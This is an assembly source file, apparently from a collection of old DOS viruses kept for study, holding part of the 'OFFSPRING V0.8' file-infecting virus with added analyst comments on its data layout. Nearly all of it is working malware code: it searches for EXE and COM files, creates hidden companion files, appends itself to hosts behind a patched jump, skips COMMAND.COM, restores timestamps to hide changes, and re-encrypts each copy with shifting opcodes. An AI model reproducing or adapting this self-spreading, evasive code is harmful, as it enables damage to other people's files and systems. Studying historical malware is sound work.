
📄 ospring.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
	    mov	    fname_off, offset fname1 ; Set search for *.EXE
	    mov	    word ptr mov_di,offset enc_data+2

	    find_first:
	    mov	    word ptr vend,0	    ; Clear ff/fn buffer
	    lea	    si, vend
	    lea	    di, vend+2
	    mov	    cx, 22
	    cld
	    rep	    movsw

	    	    			    ; Set DTA address - This is for the Findfirst/Findnext INT 21H functions
	    mov	    ah, 1ah
	    lea	    dx, vend
	    int	    21h

	    mov	    ah, 4eh		    ; Findfirst
	    mov	    cx, 0		    ; Set normal file attribute search
	    mov	    dx, fname_off
	    int	    21h

	    jnc	    next_loop		    ; if still finding files then loop
	    jmp	    end_prog

	    next_loop :
	    cmp	    byte ptr vtype, parastic ; parastic infection?
	    je	    start_inf		    ; yes, skip all this

	    mov	    ah,47h
	    xor	    dl,dl
	    lea	    si,file_dir
	    int	    21h

	    cmp	    word ptr vend[f_sizel],0 ; Make sure file isn't 64k+
	    je	    ok_find		    ; for spawning infections
	    jmp	    find_file

	    ok_find:
	    xor	    bx,bx
	    lm3	    :			    ; find end of directory name
	    inc	    bx
	    cmp	    file_dir[bx],0
	    jne	    lm3

	    mov	    file_dir[bx],'\'	    ; append backslash to path
	    inc	    bx

	    mov	    cx,13		    ; append filename to path
	    lea	    si,vend[f_name]
	    lea	    di,file_dir[bx]
	    cld
	    rep	    movsb

	    xor	    bx,bx
	    mov	    bx,1eh

	    loop_me: 			    ; search for filename ext.
	    inc	    bx
	    cmp	    byte ptr vend[bx], '.'
	    jne	    loop_me

	    inc	    bx			    ; change it to COM
	    mov	    word ptr vend [bx],'OC'
	    mov	    byte ptr vend [bx+2],'M'


	    start_inf:

	    cmp	    byte ptr vtype, parastic ; parastic infection?
	    je	    parastic_inf	    ; yes.. so jump

;--------------------------------------
; Spawning infection


	    lea	    dx, vend[f_name]
	    mov	    ah, 3ch		    ; Create file
	    mov	    cx, 02h		    ; READ-ONLY
	    or	    cx, 01h		    ; Hidden
	    int	    21h			    ; Call INT 21H
	    jnc	    contin		    ; If Error-probably already infected
	    jmp	    no_infect
	    contin:

	    inc	    inf_count
	    mov	    bx,ax

	    jmp	    encrypt_ops
;----------------------------------------
; Parastic infection

	    parastic_inf :

	    cmp	    word ptr vend+f_sizeh,400h
	    jge	    cont_inf2
	    jmp	    no_infect

	    cont_inf2:

	    lea	    si,vend+f_name	    ; Is Command.COM?
	    lea	    di,com_name
	    mov	    cx,11
	    cld
	    repe    cmpsb

	    jne	    cont_inf0		    ; Yes, don't infect
	    jmp	    no_infect

	    cont_inf0:

	    mov	    ax,3d02h		    ; Open file for reading & writing
	    lea	    dx,vend+f_name	    ; Filename in FF/FN buffer
	    int	    21h

	    jnc	    cont_inf1		    ; error, skip infection
	    jmp	    no_infect

	    cont_inf1:


	    mov	    bx,ax

	    mov	    ah,3fh		    ; Read first bytes of file
	    mov	    cx,04
	    lea	    dx,org_bytes
	    int	    21h

	    cmp	    word ptr org_bytes,0e990h
	    jne	    cont_inf
	    mov	    ah,3eh
	    int	    21h
	    jmp	    no_infect

cont_inf:
	    inc	    inf_count
	    mov	    ax,4202h		    ; Set pointer to end of file, so we
	    xor	    cx,cx		    ; can find the file size
	    xor	    dx,dx
	    int	    21h

	    mov	    word ptr set_bp,ax	    ; Change the MOV BP inst.
	    add	    ax, offset enc_data+2
	    mov	    word ptr mov_di,ax	    ; chg mov di,xxxx

	    mov	    ax,4200h
	    xor	    cx,cx
	    xor	    dx,dx
	    int	    21h

	    mov	    ax,word ptr vend+f_sizeh
	    sub	    ax,4
	    mov	    word ptr new_jmp+1,ax


	    mov	    ah,40h
	    mov	    cx,4
	    lea	    dx,new_code
	    int	    21h

	    mov	    ax,4202h
	    xor	    cx,cx
	    xor	    dx,dx
	    int	    21h


encrypt_ops:

;-----------------------------
; Change encryptions ops

	    push    bx

	    cmp	    pad_bytes,50
	    je	    reset_pad
	    inc	    word ptr pad_bytes	    ; Increase file size
	    inc	    word ptr b_wr
	    jmp	    pad_ok
	    reset_pad:
	    mov	    ax,pad_bytes
	    sub	    word ptr b_wr,ax
	    xor	    ax,ax
	    mov	    pad_bytes,ax

	    pad_ok:

	    cmp	    inc_op,47h		    ; change ops from DI to SI
	    jne	    set2
	    dec	    inc_op
	    dec	    byte ptr xor_op+1
	    dec	    di_op
	    dec	    byte ptr enc_addr
	    dec	    byte ptr enc_add+1
	    jmp	    chg_three
	    set2:
	    inc	    inc_op
	    inc	    byte ptr xor_op+1
	    inc	    di_op
	    inc	    byte ptr enc_addr
	    inc	    byte ptr enc_add+1

chg_three:
	    mov	    ah,inc_op
	    xor	    cx,cx
	    lea	    di,sw_byte3
chg_four:
	    xor	    bx,bx		    ; Switch INC xx's location
	    cmp	    word ptr [di],9090h
	    je	    mov_pos
	    inc	    bx
	    inc	    bx
	    cmp	    byte ptr [di+1],90h	    ;  is second byte not 90h
	    je	    mov_pos
	    dec	    bx
mov_pos:    mov	    word ptr [di],9090h	    ;  set all three bytes (of 3rd)
	    mov	    byte ptr [di+2],90h	    ;  to NOP
	    mov	    byte ptr [di+bx],ah	    ;  place inc xx in other byte

	    lea	    di,sw_byte4
	    inc	    cx
	    cmp	    cx,1
	    je	    chg_four
;-----------------------
; Get random XOR number, save it, copy virus, encrypt code

d2:
	    mov	    ah,2ch		    ;
	    int	    21h			    ; Get random number from clock - millisecs

	    mov	    word ptr xor_op+2,dx    ; save encryption #


	    mov	    si,0100h
	    lea	    di,vend+50		    ; destination
	    mov	    cx,offset vend-100h	    ; bytes to move
	    cld
	    rep	    movsb		    ; copy virus outside of code

	    enc_addr:
	    mov	    di,offset vend
	    enc_add:
	    add	    di,offset enc_data-100h+52 ; offset of new copy of virus

go_enc:
	    mov	    byte ptr ret_byte,0c3h
	    call    encrypt		    ; encrypt new copy of virus
	    mov	    byte ptr ret_byte,90h

;----------------------------------------
; Write and close new infected file

	    pop	    bx
	    mov	    cx, offset vend-100h    ; # of bytes to write
	    add	    cx, pad_bytes
	    lea	    dx, vend+50		    ; Offset of buffer
	    mov	    ah, 40h		    ; -- our program in memory
	    int	    21h			    ; Call INT 21H function 40h

	    mov	    ax,5701h		    ; Restore data/time
	    mov	    cx,word ptr vend[f_time]
	    mov	    dx,word ptr vend[f_date]
	    int	    21h


close:
	    mov	    ah, 3eh
	    int	    21h


no_infect:

; Find next file
	    find_file :

	    cmp	    inf_count, max_inf
	    je	    end_prog
	    mov	    ah,4fh
	    int	    21h
	    jc	    end_prog
	    jmp	    next_loop


	    end_prog:
	    exit    :
	    cmp	    inf_count,0		    ; Start parastic infection on next run
	    jne	    find_done
	    cmp	    byte ptr vtype, parastic ; Parastic infection done?
	    je	    find_done
	    mov	    fname_off, offset fname2 ; Point to new filespec
	    mov	    byte ptr vtype, parastic ; virus type = parastic
	    jmp	    find_first


	    find_done:
	    mov	    byte ptr vtype,spawn
	    mov	    fname_off, offset fname1
	    ret
resident    endp

;-----------------------------------------------------------------------
; Data area of the sample. Everything from here up to the `vend` label
; belongs to the body that the write near the end of the `resident`
; procedure appends to a host file, so these bytes travel with every copy.
;
; Analyst notes, all taken from the code visible in this excerpt:
;  * Infection marker: the appending path overwrites the first four bytes
;    of a host with new_code/new_jmp (90h, E9h, 16-bit displacement) and
;    skips any file whose first word already reads 0e990h (bytes 90h E9h).
;  * copyr and vname are plain ASCII in this listing.
;    NOTE(review): whether they lie inside the XOR-encoded region is not
;    visible here; if they do, they will not appear in clear on disk.
;  * The order and size of these fields matter: the code addresses them by
;    offset and patches some of them at run time. Do not reorder.
;-----------------------------------------------------------------------
vtype	    db	    spawn		    ; Current mode: `spawn` or `parastic` (compared and reset in `resident`)
rot_num	    dw	    0000		    ; Used when replacing bytes with OP_SET (not referenced in this excerpt)
inf_count   db	    0			    ; Files handled this run; the search loop stops when it equals max_inf
com_name    db	    'COMMAND.COM'	    ; 11-byte name compared against the found file; a match is skipped
; new_code + new_jmp form the 4-byte stub written at offset 0 of a host:
; a NOP followed by a near JMP whose displacement is patched via new_jmp+1.
new_code    db	    90h
new_jmp	    db	    0e9h,00,00		    ; New Jump
; Five bytes are reserved, but the read in this excerpt requests only 4 (cx=04).
org_bytes   db	    5 dup(0)		    ; original first bytes of the host (parasitic mode)
pad_bytes   dw	    0			    ; Extra length added to the written body; grows by 1 per pass, reset at 50
add_mem	    db	    0			    ; Add memory back? (not referenced in this excerpt)
old_dta	    dd	    0			    ; Old DTA Segment:Address (not referenced in this excerpt)
inc_op	    db	    47h			    ; INC DI (47h) or INC SI (46h); toggled between passes

copyr	    db	    '(c)1993 negoriV'	    ; author string embedded in the body
; Name banner: LF, CR, text, '$' terminator.
vname	    db	    0ah,0dh,'OFFSPRING V0.8','$'

fname1	    db	    '*.EXE',0		    ; Filespec searched first
fname2	    db	    '*.COM',0		    ; Filespec searched on the second pass
fname_off   dw	    fname1		    ; Offset of Filespec to use (switched between fname1 and fname2)
times_inc   db	    0			    ; # of times encryption call incremented (not referenced in this excerpt)
sl	    db	    '\'			    ; Backslash placed immediately before file_dir
; file_dir receives the current directory (INT 21h/47h); the code then appends
; '\' and 13 bytes of the found file name at the end of that string.
file_dir    db	    64 dup(0)		    ; directory of the file being processed
file_name   db	    13 dup(0)		    ; filename of the file being processed

; NOTE(review): the layout below resembles a DOS EXEC parameter block, but the
; call that would consume it is not in this excerpt - confirm against page 2.
par_blk	    dw	    0			    ; command line count byte   -psp
par_cmd	    dw	    0080h		    ; Point to the command line -psp
par_seg	    dw	    0			    ; seg
	    dw	    05ch		    ; Use default FCB's in psp to save space
par1	    dw	    0			    ; presumably the segment for the 05ch pointer - TODO confirm
	    dw	    06ch		    ; FCB #2
par2	    dw	    0			    ; presumably the segment for the 06ch pointer - TODO confirm
; `vend` marks the end of the body. `resident` also uses the memory from here
; on as scratch: the DTA for Findfirst/Findnext is set to vend, and the copy
; that gets encoded and written is staged at vend+50.
vend:	    	    			    ; End of virus

cseg	    ends
	    end	    start
